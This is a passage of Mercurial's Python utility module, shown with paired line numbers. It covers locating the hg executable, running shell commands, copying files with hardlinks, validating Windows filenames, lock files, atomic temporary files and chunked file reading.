1021 1033 The code supports py2exe (most common, Windows only) and tools/freeze
1022 1034 (portable, not much used).
1023 1035 """
1024 1036 return (safehasattr(sys, "frozen") or # new py2exe
1025 1037 safehasattr(sys, "importers") or # old py2exe
1026 1038 imp.is_frozen(u"__main__")) # tools/freeze
1027 1039
1028 1040 # the location of data files matching the source code
1029 1041 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1030 1042 # executable version (py2exe) doesn't support __file__
1031 1043 datapath = os.path.dirname(pycompat.sysexecutable)
1032 1044 else:
1033 1045 datapath = os.path.dirname(pycompat.fsencode(__file__))
1034 1046
1035 1047 i18n.setdatapath(datapath)
1036 1048
1037 1049 _hgexecutable = None
1038 1050
1039 1051 def hgexecutable():
1040 1052 """return location of the 'hg' executable.
1041 1053
1042 1054 Defaults to $HG or 'hg' in the search path.
1043 1055 """
1044 1056 if _hgexecutable is None:
1045 1057 hg = encoding.environ.get('HG')
1046 1058 mainmod = sys.modules[pycompat.sysstr('__main__')]
1047 1059 if hg:
1048 1060 _sethgexecutable(hg)
1049 1061 elif mainfrozen():
1050 1062 if getattr(sys, 'frozen', None) == 'macosx_app':
1051 1063 # Env variable set by py2app
1052 1064 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1053 1065 else:
1054 1066 _sethgexecutable(pycompat.sysexecutable)
1055 1067 elif (os.path.basename(
1056 1068 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1057 1069 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1058 1070 else:
1059 1071 exe = findexe('hg') or os.path.basename(sys.argv[0])
1060 1072 _sethgexecutable(exe)
1061 1073 return _hgexecutable
1062 1074
1063 1075 def _sethgexecutable(path):
1064 1076 """set location of the 'hg' executable"""
1065 1077 global _hgexecutable
1066 1078 _hgexecutable = path
1067 1079
1068 1080 def _isstdout(f):
1069 1081 fileno = getattr(f, 'fileno', None)
1070 1082 return fileno and fileno() == sys.__stdout__.fileno()
1071 1083
1072 1084 def shellenviron(environ=None):
1073 1085 """return environ with optional override, useful for shelling out"""
1074 1086 def py2shell(val):
1075 1087 'convert python object into string that is useful to shell'
1076 1088 if val is None or val is False:
1077 1089 return '0'
1078 1090 if val is True:
1079 1091 return '1'
1080 1092 return str(val)
1081 1093 env = dict(encoding.environ)
1082 1094 if environ:
1083 1095 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1084 1096 env['HG'] = hgexecutable()
1085 1097 return env
1086 1098
1087 1099 def system(cmd, environ=None, cwd=None, out=None):
1088 1100 '''enhanced shell command execution.
1089 1101 run with environment maybe modified, maybe in different dir.
1090 1102
1091 1103 if out is specified, it is assumed to be a file-like object that has a
1092 1104 write() method. stdout and stderr will be redirected to out.'''
1093 1105 try:
1094 1106 stdout.flush()
1095 1107 except Exception:
1096 1108 pass
1097 1109 cmd = quotecommand(cmd)
1098 1110 env = shellenviron(environ)
1099 1111 if out is None or _isstdout(out):
1100 1112 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1101 1113 env=env, cwd=cwd)
1102 1114 else:
1103 1115 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1104 1116 env=env, cwd=cwd, stdout=subprocess.PIPE,
1105 1117 stderr=subprocess.STDOUT)
1106 1118 for line in iter(proc.stdout.readline, ''):
1107 1119 out.write(line)
1108 1120 proc.wait()
1109 1121 rc = proc.returncode
1110 1122 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1111 1123 rc = 0
1112 1124 return rc
1113 1125
1114 1126 def checksignature(func):
1115 1127 '''wrap a function with code to check for calling errors'''
1116 1128 def check(*args, **kwargs):
1117 1129 try:
1118 1130 return func(*args, **kwargs)
1119 1131 except TypeError:
1120 1132 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1121 1133 raise error.SignatureError
1122 1134 raise
1123 1135
1124 1136 return check
1125 1137
1126 1138 # a whilelist of known filesystems where hardlink works reliably
1127 1139 _hardlinkfswhitelist = {
1128 1140 'btrfs',
1129 1141 'ext2',
1130 1142 'ext3',
1131 1143 'ext4',
1132 1144 'hfs',
1133 1145 'jfs',
1134 1146 'reiserfs',
1135 1147 'tmpfs',
1136 1148 'ufs',
1137 1149 'xfs',
1138 1150 'zfs',
1139 1151 }
1140 1152
1141 1153 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1142 1154 '''copy a file, preserving mode and optionally other stat info like
1143 1155 atime/mtime
1144 1156
1145 1157 checkambig argument is used with filestat, and is useful only if
1146 1158 destination file is guarded by any lock (e.g. repo.lock or
1147 1159 repo.wlock).
1148 1160
1149 1161 copystat and checkambig should be exclusive.
1150 1162 '''
1151 1163 assert not (copystat and checkambig)
1152 1164 oldstat = None
1153 1165 if os.path.lexists(dest):
1154 1166 if checkambig:
1155 1167 oldstat = checkambig and filestat.frompath(dest)
1156 1168 unlink(dest)
1157 1169 if hardlink:
1158 1170 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1159 1171 # unless we are confident that dest is on a whitelisted filesystem.
1160 1172 try:
1161 1173 fstype = getfstype(os.path.dirname(dest))
1162 1174 except OSError:
1163 1175 fstype = None
1164 1176 if fstype not in _hardlinkfswhitelist:
1165 1177 hardlink = False
1166 1178 if hardlink:
1167 1179 try:
1168 1180 oslink(src, dest)
1169 1181 return
1170 1182 except (IOError, OSError):
1171 1183 pass # fall back to normal copy
1172 1184 if os.path.islink(src):
1173 1185 os.symlink(os.readlink(src), dest)
1174 1186 # copytime is ignored for symlinks, but in general copytime isn't needed
1175 1187 # for them anyway
1176 1188 else:
1177 1189 try:
1178 1190 shutil.copyfile(src, dest)
1179 1191 if copystat:
1180 1192 # copystat also copies mode
1181 1193 shutil.copystat(src, dest)
1182 1194 else:
1183 1195 shutil.copymode(src, dest)
1184 1196 if oldstat and oldstat.stat:
1185 1197 newstat = filestat.frompath(dest)
1186 1198 if newstat.isambig(oldstat):
1187 1199 # stat of copied file is ambiguous to original one
1188 1200 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1189 1201 os.utime(dest, (advanced, advanced))
1190 1202 except shutil.Error as inst:
1191 1203 raise Abort(str(inst))
1192 1204
1193 1205 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1194 1206 """Copy a directory tree using hardlinks if possible."""
1195 1207 num = 0
1196 1208
1197 1209 gettopic = lambda: hardlink and _('linking') or _('copying')
1198 1210
1199 1211 if os.path.isdir(src):
1200 1212 if hardlink is None:
1201 1213 hardlink = (os.stat(src).st_dev ==
1202 1214 os.stat(os.path.dirname(dst)).st_dev)
1203 1215 topic = gettopic()
1204 1216 os.mkdir(dst)
1205 1217 for name, kind in listdir(src):
1206 1218 srcname = os.path.join(src, name)
1207 1219 dstname = os.path.join(dst, name)
1208 1220 def nprog(t, pos):
1209 1221 if pos is not None:
1210 1222 return progress(t, pos + num)
1211 1223 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1212 1224 num += n
1213 1225 else:
1214 1226 if hardlink is None:
1215 1227 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1216 1228 os.stat(os.path.dirname(dst)).st_dev)
1217 1229 topic = gettopic()
1218 1230
1219 1231 if hardlink:
1220 1232 try:
1221 1233 oslink(src, dst)
1222 1234 except (IOError, OSError):
1223 1235 hardlink = False
1224 1236 shutil.copy(src, dst)
1225 1237 else:
1226 1238 shutil.copy(src, dst)
1227 1239 num += 1
1228 1240 progress(topic, num)
1229 1241 progress(topic, None)
1230 1242
1231 1243 return hardlink, num
1232 1244
1233 1245 _winreservednames = {
1234 1246 'con', 'prn', 'aux', 'nul',
1235 1247 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1236 1248 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1237 1249 }
1238 1250 _winreservedchars = ':*?"<>|'
1239 1251 def checkwinfilename(path):
1240 1252 r'''Check that the base-relative path is a valid filename on Windows.
1241 1253 Returns None if the path is ok, or a UI string describing the problem.
1242 1254
1243 1255 >>> checkwinfilename(b"just/a/normal/path")
1244 1256 >>> checkwinfilename(b"foo/bar/con.xml")
1245 1257 "filename contains 'con', which is reserved on Windows"
1246 1258 >>> checkwinfilename(b"foo/con.xml/bar")
1247 1259 "filename contains 'con', which is reserved on Windows"
1248 1260 >>> checkwinfilename(b"foo/bar/xml.con")
1249 1261 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1250 1262 "filename contains 'AUX', which is reserved on Windows"
1251 1263 >>> checkwinfilename(b"foo/bar/bla:.txt")
1252 1264 "filename contains ':', which is reserved on Windows"
1253 1265 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1254 1266 "filename contains '\\x07', which is invalid on Windows"
1255 1267 >>> checkwinfilename(b"foo/bar/bla ")
1256 1268 "filename ends with ' ', which is not allowed on Windows"
1257 1269 >>> checkwinfilename(b"../bar")
1258 1270 >>> checkwinfilename(b"foo\\")
1259 1271 "filename ends with '\\', which is invalid on Windows"
1260 1272 >>> checkwinfilename(b"foo\\/bar")
1261 1273 "directory name ends with '\\', which is invalid on Windows"
1262 1274 '''
1263 1275 if path.endswith('\\'):
1264 1276 return _("filename ends with '\\', which is invalid on Windows")
1265 1277 if '\\/' in path:
1266 1278 return _("directory name ends with '\\', which is invalid on Windows")
1267 1279 for n in path.replace('\\', '/').split('/'):
1268 1280 if not n:
1269 1281 continue
1270 1282 for c in _filenamebytestr(n):
1271 1283 if c in _winreservedchars:
1272 1284 return _("filename contains '%s', which is reserved "
1273 1285 "on Windows") % c
1274 1286 if ord(c) <= 31:
1275 1287 return _("filename contains %r, which is invalid "
1276 1288 "on Windows") % c
1277 1289 base = n.split('.')[0]
1278 1290 if base and base.lower() in _winreservednames:
1279 1291 return _("filename contains '%s', which is reserved "
1280 1292 "on Windows") % base
1281 1293 t = n[-1]
1282 1294 if t in '. ' and n not in '..':
1283 1295 return _("filename ends with '%s', which is not allowed "
1284 1296 "on Windows") % t
1285 1297
1286 1298 if pycompat.osname == 'nt':
1287 1299 checkosfilename = checkwinfilename
1288 1300 timer = time.clock
1289 1301 else:
1290 1302 checkosfilename = platform.checkosfilename
1291 1303 timer = time.time
1292 1304
1293 1305 if safehasattr(time, "perf_counter"):
1294 1306 timer = time.perf_counter
1295 1307
1296 1308 def makelock(info, pathname):
1297 1309 try:
1298 1310 return os.symlink(info, pathname)
1299 1311 except OSError as why:
1300 1312 if why.errno == errno.EEXIST:
1301 1313 raise
1302 1314 except AttributeError: # no symlink in os
1303 1315 pass
1304 1316
1305 1317 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1306 1318 os.write(ld, info)
1307 1319 os.close(ld)
1308 1320
1309 1321 def readlock(pathname):
1310 1322 try:
1311 1323 return os.readlink(pathname)
1312 1324 except OSError as why:
1313 1325 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1314 1326 raise
1315 1327 except AttributeError: # no symlink in os
1316 1328 pass
1317 1329 fp = posixfile(pathname)
1318 1330 r = fp.read()
1319 1331 fp.close()
1320 1332 return r
1321 1333
1322 1334 def fstat(fp):
1323 1335 '''stat file object that may not have fileno method.'''
1324 1336 try:
1325 1337 return os.fstat(fp.fileno())
1326 1338 except AttributeError:
1327 1339 return os.stat(fp.name)
1328 1340
1329 1341 # File system features
1330 1342
1331 1343 def fscasesensitive(path):
1332 1344 """
1333 1345 Return true if the given path is on a case-sensitive filesystem
1334 1346
1335 1347 Requires a path (like /foo/.hg) ending with a foldable final
1336 1348 directory component.
1337 1349 """
1338 1350 s1 = os.lstat(path)
1339 1351 d, b = os.path.split(path)
1340 1352 b2 = b.upper()
1341 1353 if b == b2:
1342 1354 b2 = b.lower()
1343 1355 if b == b2:
1344 1356 return True # no evidence against case sensitivity
1345 1357 p2 = os.path.join(d, b2)
1346 1358 try:
1347 1359 s2 = os.lstat(p2)
1348 1360 if s2 == s1:
1349 1361 return False
1350 1362 return True
1351 1363 except OSError:
1352 1364 return True
1353 1365
1354 1366 try:
1355 1367 import re2
1356 1368 _re2 = None
1357 1369 except ImportError:
1358 1370 _re2 = False
1359 1371
1360 1372 class _re(object):
1361 1373 def _checkre2(self):
1362 1374 global _re2
1363 1375 try:
1364 1376 # check if match works, see issue3964
1365 1377 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1366 1378 except ImportError:
1367 1379 _re2 = False
1368 1380
1369 1381 def compile(self, pat, flags=0):
1370 1382 '''Compile a regular expression, using re2 if possible
1371 1383
1372 1384 For best performance, use only re2-compatible regexp features. The
1373 1385 only flags from the re module that are re2-compatible are
1374 1386 IGNORECASE and MULTILINE.'''
1375 1387 if _re2 is None:
1376 1388 self._checkre2()
1377 1389 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1378 1390 if flags & remod.IGNORECASE:
1379 1391 pat = '(?i)' + pat
1380 1392 if flags & remod.MULTILINE:
1381 1393 pat = '(?m)' + pat
1382 1394 try:
1383 1395 return re2.compile(pat)
1384 1396 except re2.error:
1385 1397 pass
1386 1398 return remod.compile(pat, flags)
1387 1399
1388 1400 @propertycache
1389 1401 def escape(self):
1390 1402 '''Return the version of escape corresponding to self.compile.
1391 1403
1392 1404 This is imperfect because whether re2 or re is used for a particular
1393 1405 function depends on the flags, etc, but it's the best we can do.
1394 1406 '''
1395 1407 global _re2
1396 1408 if _re2 is None:
1397 1409 self._checkre2()
1398 1410 if _re2:
1399 1411 return re2.escape
1400 1412 else:
1401 1413 return remod.escape
1402 1414
1403 1415 re = _re()
1404 1416
1405 1417 _fspathcache = {}
1406 1418 def fspath(name, root):
1407 1419 '''Get name in the case stored in the filesystem
1408 1420
1409 1421 The name should be relative to root, and be normcase-ed for efficiency.
1410 1422
1411 1423 Note that this function is unnecessary, and should not be
1412 1424 called, for case-sensitive filesystems (simply because it's expensive).
1413 1425
1414 1426 The root should be normcase-ed, too.
1415 1427 '''
1416 1428 def _makefspathcacheentry(dir):
1417 1429 return dict((normcase(n), n) for n in os.listdir(dir))
1418 1430
1419 1431 seps = pycompat.ossep
1420 1432 if pycompat.osaltsep:
1421 1433 seps = seps + pycompat.osaltsep
1422 1434 # Protect backslashes. This gets silly very quickly.
1423 1435 seps.replace('\\','\\\\')
1424 1436 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1425 1437 dir = os.path.normpath(root)
1426 1438 result = []
1427 1439 for part, sep in pattern.findall(name):
1428 1440 if sep:
1429 1441 result.append(sep)
1430 1442 continue
1431 1443
1432 1444 if dir not in _fspathcache:
1433 1445 _fspathcache[dir] = _makefspathcacheentry(dir)
1434 1446 contents = _fspathcache[dir]
1435 1447
1436 1448 found = contents.get(part)
1437 1449 if not found:
1438 1450 # retry "once per directory" per "dirstate.walk" which
1439 1451 # may take place for each patches of "hg qpush", for example
1440 1452 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1441 1453 found = contents.get(part)
1442 1454
1443 1455 result.append(found or part)
1444 1456 dir = os.path.join(dir, part)
1445 1457
1446 1458 return ''.join(result)
1447 1459
1448 1460 def getfstype(dirpath):
1449 1461 '''Get the filesystem type name from a directory (best-effort)
1450 1462
1451 1463 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1452 1464 '''
1453 1465 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1454 1466
1455 1467 def checknlink(testfile):
1456 1468 '''check whether hardlink count reporting works properly'''
1457 1469
1458 1470 # testfile may be open, so we need a separate file for checking to
1459 1471 # work around issue2543 (or testfile may get lost on Samba shares)
1460 1472 f1, f2, fp = None, None, None
1461 1473 try:
1462 1474 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1463 1475 suffix='1~', dir=os.path.dirname(testfile))
1464 1476 os.close(fd)
1465 1477 f2 = '%s2~' % f1[:-2]
1466 1478
1467 1479 oslink(f1, f2)
1468 1480 # nlinks() may behave differently for files on Windows shares if
1469 1481 # the file is open.
1470 1482 fp = posixfile(f2)
1471 1483 return nlinks(f2) > 1
1472 1484 except OSError:
1473 1485 return False
1474 1486 finally:
1475 1487 if fp is not None:
1476 1488 fp.close()
1477 1489 for f in (f1, f2):
1478 1490 try:
1479 1491 if f is not None:
1480 1492 os.unlink(f)
1481 1493 except OSError:
1482 1494 pass
1483 1495
1484 1496 def endswithsep(path):
1485 1497 '''Check path ends with os.sep or os.altsep.'''
1486 1498 return (path.endswith(pycompat.ossep)
1487 1499 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1488 1500
1489 1501 def splitpath(path):
1490 1502 '''Split path by os.sep.
1491 1503 Note that this function does not use os.altsep because this is
1492 1504 an alternative of simple "xxx.split(os.sep)".
1493 1505 It is recommended to use os.path.normpath() before using this
1494 1506 function if need.'''
1495 1507 return path.split(pycompat.ossep)
1496 1508
1497 1509 def gui():
1498 1510 '''Are we running in a GUI?'''
1499 1511 if pycompat.sysplatform == 'darwin':
1500 1512 if 'SSH_CONNECTION' in encoding.environ:
1501 1513 # handle SSH access to a box where the user is logged in
1502 1514 return False
1503 1515 elif getattr(osutil, 'isgui', None):
1504 1516 # check if a CoreGraphics session is available
1505 1517 return osutil.isgui()
1506 1518 else:
1507 1519 # pure build; use a safe default
1508 1520 return True
1509 1521 else:
1510 1522 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1511 1523
1512 1524 def mktempcopy(name, emptyok=False, createmode=None):
1513 1525 """Create a temporary file with the same contents from name
1514 1526
1515 1527 The permission bits are copied from the original file.
1516 1528
1517 1529 If the temporary file is going to be truncated immediately, you
1518 1530 can use emptyok=True as an optimization.
1519 1531
1520 1532 Returns the name of the temporary file.
1521 1533 """
1522 1534 d, fn = os.path.split(name)
1523 1535 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1524 1536 os.close(fd)
1525 1537 # Temporary files are created with mode 0600, which is usually not
1526 1538 # what we want. If the original file already exists, just copy
1527 1539 # its mode. Otherwise, manually obey umask.
1528 1540 copymode(name, temp, createmode)
1529 1541 if emptyok:
1530 1542 return temp
1531 1543 try:
1532 1544 try:
1533 1545 ifp = posixfile(name, "rb")
1534 1546 except IOError as inst:
1535 1547 if inst.errno == errno.ENOENT:
1536 1548 return temp
1537 1549 if not getattr(inst, 'filename', None):
1538 1550 inst.filename = name
1539 1551 raise
1540 1552 ofp = posixfile(temp, "wb")
1541 1553 for chunk in filechunkiter(ifp):
1542 1554 ofp.write(chunk)
1543 1555 ifp.close()
1544 1556 ofp.close()
1545 1557 except: # re-raises
1546 1558 try: os.unlink(temp)
1547 1559 except OSError: pass
1548 1560 raise
1549 1561 return temp
1550 1562
1551 1563 class filestat(object):
1552 1564 """help to exactly detect change of a file
1553 1565
1554 1566 'stat' attribute is result of 'os.stat()' if specified 'path'
1555 1567 exists. Otherwise, it is None. This can avoid preparative
1556 1568 'exists()' examination on client side of this class.
1557 1569 """
1558 1570 def __init__(self, stat):
1559 1571 self.stat = stat
1560 1572
1561 1573 @classmethod
1562 1574 def frompath(cls, path):
1563 1575 try:
1564 1576 stat = os.stat(path)
1565 1577 except OSError as err:
1566 1578 if err.errno != errno.ENOENT:
1567 1579 raise
1568 1580 stat = None
1569 1581 return cls(stat)
1570 1582
1571 1583 @classmethod
1572 1584 def fromfp(cls, fp):
1573 1585 stat = os.fstat(fp.fileno())
1574 1586 return cls(stat)
1575 1587
1576 1588 __hash__ = object.__hash__
1577 1589
1578 1590 def __eq__(self, old):
1579 1591 try:
1580 1592 # if ambiguity between stat of new and old file is
1581 1593 # avoided, comparison of size, ctime and mtime is enough
1582 1594 # to exactly detect change of a file regardless of platform
1583 1595 return (self.stat.st_size == old.stat.st_size and
1584 1596 self.stat.st_ctime == old.stat.st_ctime and
1585 1597 self.stat.st_mtime == old.stat.st_mtime)
1586 1598 except AttributeError:
1587 1599 pass
1588 1600 try:
1589 1601 return self.stat is None and old.stat is None
1590 1602 except AttributeError:
1591 1603 return False
1592 1604
1593 1605 def isambig(self, old):
1594 1606 """Examine whether new (= self) stat is ambiguous against old one
1595 1607
1596 1608 "S[N]" below means stat of a file at N-th change:
1597 1609
1598 1610 - S[n-1].ctime < S[n].ctime: can detect change of a file
1599 1611 - S[n-1].ctime == S[n].ctime
1600 1612 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1601 1613 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1602 1614 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1603 1615 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1604 1616
1605 1617 Case (*2) above means that a file was changed twice or more at
1606 1618 same time in sec (= S[n-1].ctime), and comparison of timestamp
1607 1619 is ambiguous.
1608 1620
1609 1621 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1610 1622 timestamp is ambiguous".
1611 1623
1612 1624 But advancing mtime only in case (*2) doesn't work as
1613 1625 expected, because naturally advanced S[n].mtime in case (*1)
1614 1626 might be equal to manually advanced S[n-1 or earlier].mtime.
1615 1627
1616 1628 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1617 1629 treated as ambiguous regardless of mtime, to avoid overlooking
1618 1630 by confliction between such mtime.
1619 1631
1620 1632 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1621 1633 S[n].mtime", even if size of a file isn't changed.
1622 1634 """
1623 1635 try:
1624 1636 return (self.stat.st_ctime == old.stat.st_ctime)
1625 1637 except AttributeError:
1626 1638 return False
1627 1639
1628 1640 def avoidambig(self, path, old):
1629 1641 """Change file stat of specified path to avoid ambiguity
1630 1642
1631 1643 'old' should be previous filestat of 'path'.
1632 1644
1633 1645 This skips avoiding ambiguity, if a process doesn't have
1634 1646 appropriate privileges for 'path'. This returns False in this
1635 1647 case.
1636 1648
1637 1649 Otherwise, this returns True, as "ambiguity is avoided".
1638 1650 """
1639 1651 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1640 1652 try:
1641 1653 os.utime(path, (advanced, advanced))
1642 1654 except OSError as inst:
1643 1655 if inst.errno == errno.EPERM:
1644 1656 # utime() on the file created by another user causes EPERM,
1645 1657 # if a process doesn't have appropriate privileges
1646 1658 return False
1647 1659 raise
1648 1660 return True
1649 1661
1650 1662 def __ne__(self, other):
1651 1663 return not self == other
1652 1664
1653 1665 class atomictempfile(object):
1654 1666 '''writable file object that atomically updates a file
1655 1667
1656 1668 All writes will go to a temporary copy of the original file. Call
1657 1669 close() when you are done writing, and atomictempfile will rename
1658 1670 the temporary copy to the original name, making the changes
1659 1671 visible. If the object is destroyed without being closed, all your
1660 1672 writes are discarded.
1661 1673
1662 1674 checkambig argument of constructor is used with filestat, and is
1663 1675 useful only if target file is guarded by any lock (e.g. repo.lock
1664 1676 or repo.wlock).
1665 1677 '''
1666 1678 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1667 1679 self.__name = name # permanent name
1668 1680 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1669 1681 createmode=createmode)
1670 1682 self._fp = posixfile(self._tempname, mode)
1671 1683 self._checkambig = checkambig
1672 1684
1673 1685 # delegated methods
1674 1686 self.read = self._fp.read
1675 1687 self.write = self._fp.write
1676 1688 self.seek = self._fp.seek
1677 1689 self.tell = self._fp.tell
1678 1690 self.fileno = self._fp.fileno
1679 1691
1680 1692 def close(self):
1681 1693 if not self._fp.closed:
1682 1694 self._fp.close()
1683 1695 filename = localpath(self.__name)
1684 1696 oldstat = self._checkambig and filestat.frompath(filename)
1685 1697 if oldstat and oldstat.stat:
1686 1698 rename(self._tempname, filename)
1687 1699 newstat = filestat.frompath(filename)
1688 1700 if newstat.isambig(oldstat):
1689 1701 # stat of changed file is ambiguous to original one
1690 1702 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1691 1703 os.utime(filename, (advanced, advanced))
1692 1704 else:
1693 1705 rename(self._tempname, filename)
1694 1706
1695 1707 def discard(self):
1696 1708 if not self._fp.closed:
1697 1709 try:
1698 1710 os.unlink(self._tempname)
1699 1711 except OSError:
1700 1712 pass
1701 1713 self._fp.close()
1702 1714
1703 1715 def __del__(self):
1704 1716 if safehasattr(self, '_fp'): # constructor actually did something
1705 1717 self.discard()
1706 1718
1707 1719 def __enter__(self):
1708 1720 return self
1709 1721
1710 1722 def __exit__(self, exctype, excvalue, traceback):
1711 1723 if exctype is not None:
1712 1724 self.discard()
1713 1725 else:
1714 1726 self.close()
1715 1727
1716 1728 def unlinkpath(f, ignoremissing=False):
1717 1729 """unlink and remove the directory if it is empty"""
1718 1730 if ignoremissing:
1719 1731 tryunlink(f)
1720 1732 else:
1721 1733 unlink(f)
1722 1734 # try removing directories that might now be empty
1723 1735 try:
1724 1736 removedirs(os.path.dirname(f))
1725 1737 except OSError:
1726 1738 pass
1727 1739
1728 1740 def tryunlink(f):
1729 1741 """Attempt to remove a file, ignoring ENOENT errors."""
1730 1742 try:
1731 1743 unlink(f)
1732 1744 except OSError as e:
1733 1745 if e.errno != errno.ENOENT:
1734 1746 raise
1735 1747
1736 1748 def makedirs(name, mode=None, notindexed=False):
1737 1749 """recursive directory creation with parent mode inheritance
1738 1750
1739 1751 Newly created directories are marked as "not to be indexed by
1740 1752 the content indexing service", if ``notindexed`` is specified
1741 1753 for "write" mode access.
1742 1754 """
1743 1755 try:
1744 1756 makedir(name, notindexed)
1745 1757 except OSError as err:
1746 1758 if err.errno == errno.EEXIST:
1747 1759 return
1748 1760 if err.errno != errno.ENOENT or not name:
1749 1761 raise
1750 1762 parent = os.path.dirname(os.path.abspath(name))
1751 1763 if parent == name:
1752 1764 raise
1753 1765 makedirs(parent, mode, notindexed)
1754 1766 try:
1755 1767 makedir(name, notindexed)
1756 1768 except OSError as err:
1757 1769 # Catch EEXIST to handle races
1758 1770 if err.errno == errno.EEXIST:
1759 1771 return
1760 1772 raise
1761 1773 if mode is not None:
1762 1774 os.chmod(name, mode)
1763 1775
1764 1776 def readfile(path):
1765 1777 with open(path, 'rb') as fp:
1766 1778 return fp.read()
1767 1779
1768 1780 def writefile(path, text):
1769 1781 with open(path, 'wb') as fp:
1770 1782 fp.write(text)
1771 1783
1772 1784 def appendfile(path, text):
1773 1785 with open(path, 'ab') as fp:
1774 1786 fp.write(text)
1775 1787
1776 1788 class chunkbuffer(object):
1777 1789 """Allow arbitrary sized chunks of data to be efficiently read from an
1778 1790 iterator over chunks of arbitrary size."""
1779 1791
1780 1792 def __init__(self, in_iter):
1781 1793 """in_iter is the iterator that's iterating over the input chunks."""
1782 1794 def splitbig(chunks):
1783 1795 for chunk in chunks:
1784 1796 if len(chunk) > 2**20:
1785 1797 pos = 0
1786 1798 while pos < len(chunk):
1787 1799 end = pos + 2 ** 18
1788 1800 yield chunk[pos:end]
1789 1801 pos = end
1790 1802 else:
1791 1803 yield chunk
1792 1804 self.iter = splitbig(in_iter)
1793 1805 self._queue = collections.deque()
1794 1806 self._chunkoffset = 0
1795 1807
1796 1808 def read(self, l=None):
1797 1809 """Read L bytes of data from the iterator of chunks of data.
1798 1810 Returns less than L bytes if the iterator runs dry.
1799 1811
1800 1812 If size parameter is omitted, read everything"""
1801 1813 if l is None:
1802 1814 return ''.join(self.iter)
1803 1815
1804 1816 left = l
1805 1817 buf = []
1806 1818 queue = self._queue
1807 1819 while left > 0:
1808 1820 # refill the queue
1809 1821 if not queue:
1810 1822 target = 2**18
1811 1823 for chunk in self.iter:
1812 1824 queue.append(chunk)
1813 1825 target -= len(chunk)
1814 1826 if target <= 0:
1815 1827 break
1816 1828 if not queue:
1817 1829 break
1818 1830
1819 1831 # The easy way to do this would be to queue.popleft(), modify the
1820 1832 # chunk (if necessary), then queue.appendleft(). However, for cases
1821 1833 # where we read partial chunk content, this incurs 2 dequeue
1822 1834 # mutations and creates a new str for the remaining chunk in the
1823 1835 # queue. Our code below avoids this overhead.
1824 1836
1825 1837 chunk = queue[0]
1826 1838 chunkl = len(chunk)
1827 1839 offset = self._chunkoffset
1828 1840
1829 1841 # Use full chunk.
1830 1842 if offset == 0 and left >= chunkl:
1831 1843 left -= chunkl
1832 1844 queue.popleft()
1833 1845 buf.append(chunk)
1834 1846 # self._chunkoffset remains at 0.
1835 1847 continue
1836 1848
1837 1849 chunkremaining = chunkl - offset
1838 1850
1839 1851 # Use all of unconsumed part of chunk.
1840 1852 if left >= chunkremaining:
1841 1853 left -= chunkremaining
1842 1854 queue.popleft()
1843 1855 # offset == 0 is enabled by block above, so this won't merely
1844 1856 # copy via ``chunk[0:]``.
1845 1857 buf.append(chunk[offset:])
1846 1858 self._chunkoffset = 0
1847 1859
1848 1860 # Partial chunk needed.
1849 1861 else:
1850 1862 buf.append(chunk[offset:offset + left])
1851 1863 self._chunkoffset += left
1852 1864 left -= chunkremaining
1853 1865
1854 1866 return ''.join(buf)
1855 1867
1856 1868 def filechunkiter(f, size=131072, limit=None):
1857 1869 """Create a generator that produces the data in the file size
1858 1870 (default 131072) bytes at a time, up to optional limit (default is
1859 1871 to read all data). Chunks may be less than size bytes if the
1860 1872 chunk is the last chunk in the file, or the file is a socket or
1861 1873 some other type of file that sometimes reads less data than is
1862 1874 requested."""
1863 1875 assert size >= 0
1864 1876 assert limit is None or limit >= 0
1865 1877 while True:
1866 1878 if limit is None:
1867 1879 nbytes = size
1868 1880 else:
1869 1881 nbytes = min(limit, size)
1870 1882 s = nbytes and f.read(nbytes)
1871 1883 if not s:
1872 1884 break
1873 1885 if limit:
1874 1886 limit -= len(s)
1875 1887 yield s
1876 1888
1877 1889 def makedate(timestamp=None):
1878 1890 '''Return a unix timestamp (or the current time) as a (unixtime,
1879 1891 offset) tuple based off the local timezone.'''
1880 1892 if timestamp is None:
